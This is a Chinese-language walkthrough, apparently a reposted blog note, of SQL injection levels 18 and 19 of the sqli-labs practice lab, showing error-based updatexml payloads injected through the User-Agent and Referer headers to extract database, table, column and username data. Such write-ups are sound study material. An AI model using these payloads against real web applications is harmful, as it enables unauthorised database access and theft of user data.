登录失败显示ip地址
登录成功显示ip地址和User-Agent----- 浏览器的版本
如果出现密码不正确 登录不上去 可能是第17关修改了密码 解决方案 可是在17关将密码修改回来
或者在主页 重置数据库
发现有转义操作 所以不能对用户名和密码进行盲注
最后测试发现可以在http头部user-agent的地方注入。
再次执行 查看post信息,我们注入的时候考虑---ip地址和User-Agent 这俩个地址
插入俩句语句 再次观察
INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`)
VALUES (‘Mozilla/5.0 (Windows NT 5.2; rv:17.0) Gecko/20100101 Firefox/17.0‘, ‘192.168.50.100‘, ‘admin‘) 显示浏览器信息,ip地址,用户名
涉及到的sql语句 可以在命令行中验证对错
----‘ or updatexml(1,concat(0x7e,()),1);
----select updatexml(1,concat(0x7e,(database())),1);
查当前数据库:‘or updatexml(1,concat(0x7e,(database())),1) or ‘1‘=‘1(注意闭合)
或者‘or updatexml(1,concat(0x7e,(database())),1) , " , " )# 闭合sql语句 空的部分是将用户名和密码位置空出来
‘ or updatexml(1,concat(0x7e,(database())),1), ‘‘,‘‘)#
库 ‘ or updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1)),1), ‘‘,‘‘)#
表 ‘ or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=‘security‘ limit 0,1)),1), ‘‘,‘‘)#
列 ‘ or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name=‘users‘ limit 0,1)),1), ‘‘,‘‘)#
字段 ‘ or updatexml(1,concat(0x7e,(select username from security.users limit 0,1)),1), ‘‘,‘‘)#
less19
第19关的回显信息
通过insert语句 进行分析
INSERT INTO `security`.`referers` (`referer`, `ip_address`)
VALUES (‘http://192.168.50.100/sqli/Less-19/‘, ‘192.168.50.100‘)
分析后得知,需要进行闭合操作,两种方法:
(1)‘ or updatexml(1,concat(0x7e,(database())),1) and ‘1‘=‘1
(2)‘ or updatexml(1,concat(0x7e,(database())),1), ‘’)#
原文:https://www.cnblogs.com/xingyuner/p/12236603.html